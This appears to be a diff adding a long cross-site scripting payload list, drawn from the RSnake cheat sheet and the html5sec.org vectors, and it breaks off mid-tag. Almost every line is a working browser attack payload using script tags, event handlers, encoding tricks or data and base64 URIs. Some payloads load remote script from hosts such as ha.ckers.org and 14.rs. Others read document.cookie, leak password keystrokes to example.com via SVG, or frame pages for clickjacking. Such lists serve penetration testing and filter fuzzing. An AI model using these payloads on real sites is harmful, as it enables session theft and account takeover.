+<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +"><img src=x onerror=prompt(1);> +<SCRIPT>alert('XSS');</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> +<IMG SRC="javascript:alert('XSS')" +<SCRIPT>a=/XSS/ +\";alert('XSS');// +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<BODY ONLOAD=alert('XSS')> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LAYER 
SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="mocha:[code]"> +<IMG SRC="livescript:[code]"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<XSS STYLE='no\xss:noxss("*//*"); +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<BASE HREF="javascript:alert('XSS');//"> +<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +getURL("javascript:alert('XSS')") +a="get"; +<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');"> +<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> 
+<HTML><BODY> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)'; +<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<svg%0Aonload=%09((pro\u006dpt))()// +<sCriPt x>(((confirm)))``</scRipt x> +<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z +<deTAiLs/open/oNtoGGle=confirm()> +<scRiPt y="><">/*<sCRipt* */prompt()</script +<A href="javascript%26colon;confirm()">click +<sVg oNloaD=write()> +<A href=javas%26#99;ript:alert(1)>click +<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)> +<svG/x=">"/oNloaD=confirm()// +<--`<iMG/srC=` onerror=confirm``> --!> +<SVg </onlOad ="1> (_=prompt,_(1)) ""> +<!--><scRipT src=//14.rs> +<sCriPt/src=//14.rs? 
+<sCRIpt x=">" src=//15.rs></script> +<D3/OnMouSEenTer=[2].find(confirm)>z +<D3"<"/OncLick="1>[confirm``]"<">z +<D3/OnpOinTeReENter=confirm``>click here +<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> +<Z oncut=alert()>x +<iFrAMe/src \/\/onload = prompt(1) +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> +>>> vectors() +<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div 
id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(24)&gt;`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div> +<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(28)&gt;>//["'`-->]]>]</div> +<div id="29"><link rel=stylesheet href=data:,*%7bx:expression(alert(29))%7d//["'`-->]]>]</div><div id="30"><style>@import "data:,*%7bx:expression(alert(30))%7D";</style>//["'`-->]]>]</div><div id="31"><frameset onload=alert(31)>//["'`-->]]>]</div><div id="32"><table 
background="javascript:alert(32)"></table>//["'`-->]]>]</div><div id="33"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(33);">XXX</a></a><a href="javascript:alert(2)">XXX</a>//["'`-->]]>]</div><div id="34">1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>//["'`-->]]>]</div><div id="35">1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(35) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>//["'`-->]]>]</div><div id="36"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(36)">XXX</a>//["'`-->]]>]</div><div id="37"><!--<img src="--><img src=x onerror=alert(37)//">//["'`-->]]>]</div><div id="38"><comment><img src="</comment><img src=x onerror=alert(38)//">//["'`-->]]>]</div> +<div id="39"><!-- up to Opera 11.52, FF 3.6.28 --> +<![><img src="]><img src=x onerror=alert(39)//"> +<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> +<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>//["'`-->]]>]</div> +<div id="40"><style><img src="</style><img src=x onerror=alert(40)//">//["'`-->]]>]</div> +<div id="41"><li style=list-style:url() onerror=alert(41)></li> +<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(41)></div>//["'`-->]]>]</div> +<div id="42"><head><base href="javascript://"/></head><body><a href="/. 
/,alert(42)//#">XXX</a></body>//["'`-->]]>]</div> +<div id="43"><?xml version="1.0" standalone="no"?> +<html xmlns="http://www.w3.org/1999/xhtml"> +<head><style type="text/css">@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}</style></head> +<body>Hello</body> +</html>//["'`-->]]>]</div> +<div id="44"><style>*[{}@import'test.css?]{color: green;}</style>X//["'`-->]]>]</div><div id="45"><div style="font-family:'foo[a];color:red;';">XXX</div>//["'`-->]]>]</div><div id="46"><div style="font-family:foo}color=red;">XXX</div>//["'`-->]]>]</div><div id="47"><svg xmlns="http://www.w3.org/2000/svg"><script>alert(47)</script></svg>//["'`-->]]>]</div><div id="48"><SCRIPT FOR=document EVENT=onreadystatechange>alert(48)</SCRIPT>//["'`-->]]>]</div><div id="49"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(49)"></OBJECT>//["'`-->]]>]</div><div id="50"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>//["'`-->]]>]</div><div id="51"><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>//["'`-->]]>]</div><div id="52"><x style="behavior:url(test.sct)">//["'`-->]]>]</div> +<div id="53"><xml id="xss" src="test.htc"></xml> +<label dataformatas="html" datasrc="#xss" datafld="payload"></label>//["'`-->]]>]</div> +<div id="54"><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//["'`-->]]>]</div><div id="55"><video><source onerror="alert(55)">//["'`-->]]>]</div><div id="56"><video onerror="alert(56)"><source></source></video>//["'`-->]]>]</div><div id="57"><b <script>alert(57)//</script>0</script></b>//["'`-->]]>]</div><div id="58"><b><script<b></b><alert(58)</script </b></b>//["'`-->]]>]</div><div id="59"><div id="div1"><input value="``onmouseover=alert(59)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = 
document.getElementById("div1").innerHTML;</script>//["'`-->]]>]</div><div id="60"><div style="[a]color[b]:[c]red">XXX</div>//["'`-->]]>]</div> +<div id="61"><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>//["'`-->]]>]</div> +<div id="62"><!-- IE 6-8 --> +<x '="foo"><x foo='><img src=x onerror=alert(62)//'> +<!-- IE 6-9 --> +<! '="foo"><x foo='><img src=x onerror=alert(2)//'> +<? '="foo"><x foo='><img src=x onerror=alert(3)//'>//["'`-->]]>]</div> +<div id="63"><embed src="javascript:alert(63)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF +<img src="javascript:alert(2)"> +<image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ +<script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓//["'`-->]]>]</div> +<div id="64"><!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>//["'`-->]]>]</div><div id="65"><svg onload="javascript:alert(65)" xmlns="http://www.w3.org/2000/svg"></svg>//["'`-->]]>]</div> +<div id="66"><?xml version="1.0"?> +<?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(66)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> +<root/>//["'`-->]]>]</div> +<div id="67"><!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x"onerror CDATA "alert(67)"onload CDATA "alert(2)">]><img />//["'`-->]]>]</div> +<div id="68"><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(68)" xlink:type="simple">XXX</x></doc>//["'`-->]]>]</div> +<div id="69"><card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(69)"/></onevent><timer value="1"/></card>//["'`-->]]>]</div><div id="70"><div style=width:1px;filter:glow 
onfilterchange=alert(70)>x</div>//["'`-->]]>]</div><div id="71"><// style=x:expression\28alert(71)\29>//["'`-->]]>]</div><div id="72"><form><button formaction="javascript:alert(72)">X</button>//["'`-->]]>]</div><div id="73"><event-source src="event.php" onload="alert(73)">//["'`-->]]>]</div><div id="74"><a href="javascript:alert(74)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>//["'`-->]]>]</div><div id="75"><script<{alert(75)}/></script </>//["'`-->]]>]</div><div id="76"><?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>//["'`-->]]>]</div><div id="77"><?xml-stylesheet type="text/css"?><root style="x:expression(alert(77))"/>//["'`-->]]>]</div><div id="78"><?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>//["'`-->]]>]</div><div id="79"><object allowscriptaccess="always" data="test.swf"></object>//["'`-->]]>]</div><div id="80"><style>*{x:expression(alert(80))}</style>//["'`-->]]>]</div><div id="81"><x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(81)" xlink:type="simple"/>//["'`-->]]>]</div><div id="82"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>//["'`-->]]>]</div> +<div id="83"><x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(83)"><x:timer value="1"/></x:template>//["'`-->]]>]</div> +<div id="84"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(84)//#x"/>//["'`-->]]>]</div><div id="85"><x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>//["'`-->]]>]</div><div id="86"><body oninput=alert(86)><input autofocus>//["'`-->]]>]</div> +<div id="87"><svg xmlns="http://www.w3.org/2000/svg"> +<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(87)"><rect width="1000" height="1000" fill="white"/></a> 
+</svg>//["'`-->]]>]</div> +<div id="88"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> +<animation xlink:href="javascript:alert(88)"/> +<animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> +<image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(88)'%3E%3C/svg%3E"/> +<foreignObject xlink:href="javascript:alert(88)"/> +<foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(88)%3C/script%3E"/> +</svg>//["'`-->]]>]</div> +<div id="89"><svg xmlns="http://www.w3.org/2000/svg"> +<set attributeName="onmouseover" to="alert(89)"/> +<animate attributeName="onunload" to="alert(89)"/> +</svg>//["'`-->]]>]</div> +<div id="90"><!-- Up to Opera 10.63 --> +<div style=content:url(test2.svg)></div> +<!-- Up to Opera 11.64 - see link below --> +<!-- Up to Opera 12.x --> +<div style="background:url(test5.svg)">PRESS ENTER</div>//["'`-->]]>]</div> +<div id="91">[A] +<? foo="><script>alert(91)</script>"> +<! foo="><script>alert(91)</script>"> +</ foo="><script>alert(91)</script>"> +<? foo="><x foo='?><script>alert(91)</script>'>"> +<! 
foo="[[[x]]"><x foo="]foo><script>alert(91)</script>"> +<% foo><x foo="%><script>alert(91)</script>">//["'`-->]]>]</div> +<div id="92"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="93"><div style="list-style:url(http://foo.f)\20url(javascript:alert(93));">X</div>//["'`-->]]>]</div> +<div id="94"><svg xmlns="http://www.w3.org/2000/svg"> +<handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(94)</handler> +</svg>//["'`-->]]>]</div> +<div id="95"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> +<feImage><set attributeName="xlink:href" to="data:image/svg+xml;charset=utf-8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/></feImage> +</svg>//["'`-->]]>]</div> +<div id="96"><iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> +<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>//["'`-->]]>]</div> +<div id="97"><!-- IE 5-9 --> +<div id=d><x xmlns="><iframe onload=alert(97)"></div> +<script>d.innerHTML+='';</script> +<!-- IE 10 in IE5-9 Standards mode --> +<div id=d><x xmlns='"><iframe onload=alert(2)//'></div> +<script>d.innerHTML+='';</script>//["'`-->]]>]</div> +<div id="98"><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> +<script>with(document.getElementById("d"))innerHTML=innerHTML</script>//["'`-->]]>]</div> +<div id="99">XXX<style> +*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */ +<!-- +--><!--*{color:red} /* all UA */ +*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */ +</style>//["'`-->]]>]</div> +<div id="100"><img[a][b]src=x[d]onerror[c]=[e]"alert(100)">//["'`-->]]>]</div><div id="101"><a href="[a]java[b]script[c]:alert(101)">XXX</a>//["'`-->]]>]</div><div id="102"><img src="x` `<script>alert(102)</script>"` `>//["'`-->]]>]</div><div 
id="103"><script>history.pushState(0,0,'/i/am/somewhere_else');</script>//["'`-->]]>]</div> +<div id="104"><svg xmlns="http://www.w3.org/2000/svg" id="foo"> +<x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(104) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> +</svg>//["'`-->]]>]</div> +<div id="105"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>//["'`-->]]>]</div><div id="106"><img src onerror /" '"= alt=alert(106)//">//["'`-->]]>]</div><div id="107"><title onpropertychange=alert(107)></title><title title=></title>//["'`-->]]>]</div> +<div id="108"><!-- IE 5-8 standards mode --> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(108)></a>"> +<!-- IE 5-9 standards mode --> +<!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> +<?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">//["'`-->]]>]</div> +<div id="109"><svg xmlns="http://www.w3.org/2000/svg"> +<a id="x"><rect fill="white" width="1000" height="1000"/></a> +<rect fill="white" style="clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);"/> +</svg>//["'`-->]]>]</div> +<div id="110"><svg xmlns="http://www.w3.org/2000/svg"> +<path d="M0,0" style="marker-start:url(test4.svg#a)"/> +</svg>//["'`-->]]>]</div> +<div id="111"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div><div id="112"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>//["'`-->]]>]</div> +<div id="113"><div id="x">XXX</div> +<style>#x{font-family:foo[bar;color:green;}#y];color:red;{}</style>//["'`-->]]>]</div> +<div id="114"><x 
style="background:url('x[a];color:red;/*')">XXX</x>//["'`-->]]>]</div> +<div id="115"><!--[if]><script>alert(115)</script --> +<!--[if<img src=x onerror=alert(2)//]> -->//["'`-->]]>]</div> +<div id="116"><div id="x">x</div> +<xml:namespace prefix="t"> +<import namespace="t" implementation="#default#time2"> +<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(116)&gt;">//["'`-->]]>]</div> +<div id="117"><a href="http://attacker.org"> +<iframe src="http://example.org/"></iframe> +</a>//["'`-->]]>]</div> +<div id="118"><div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"><h1>Drop me</h1></div> +<iframe src="http://www.example.org/dropHere.html"></iframe>//["'`-->]]>]</div> +<div id="119"><iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> +<textarea type="text" cols="50" rows="10"></textarea>//["'`-->]]>]</div> +<div id="120"><script>function makePopups(){for (i=1;i<6;i++) {window.open('popup.html','spam'+i,'width=50,height=50');}}</script> +<body><a href="#" onclick="makePopups()">Spam</a>//["'`-->]]>]</div> +<div id="121"><html xmlns="http://www.w3.org/1999/xhtml" +xmlns:svg="http://www.w3.org/2000/svg"> +<body style="background:gray"> +<iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> +<svg:svg><svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"><svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body> +</html>//["'`-->]]>]</div> +<div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div> +<div id="123"><span class=foo>Some text</span> +<a class=bar href="http://www.example.org">www.example.org</a> +<script 
src="http://code.jquery.com/jquery-1.4.4.js"></script> +<script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>//["'`-->]]>]</div> +<div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 +<script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div> +<div id="125"><?xml version="1.0"?> +<?xml-stylesheet type="text/xml" href="#stylesheet"?> +<!DOCTYPE doc [ +<!ATTLIST xsl:stylesheet id ID #REQUIRED>]> +<svg xmlns="http://www.w3.org/2000/svg"> +<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe> </xsl:template></xsl:stylesheet><circle fill="red" r="40"></circle></svg>//["'`-->]]>]</div> +<div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> +<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div> +<div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x"> +<listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> +<handler id="y">alert(127)</handler> +</svg>//["'`-->]]>]</div> +<div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div> +<div id="129"><svg> +<image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'> +</svg>//["'`-->]]>]</div> +<div id="130"><math href="javascript:alert(130)">CLICKME</math> +<math> +<maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> +<maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> +</math>//["'`-->]]>]</div> +<div id="131"><b>drag 
and drop one of the following strings to the drop box:</b> +<br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b> +<br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> +<div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div> +<div id="132"><!doctype html> +<form> +<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> +<br> +<input name="secret" type="password"> +</form> +<!-- injection --><svg height="50px"> +<image xmlns:xlink="http://www.w3.org/1999/xlink"> +<set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> +<set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> +<set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> +<set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> +</image> +</svg>//["'`-->]]>]</div> +<div 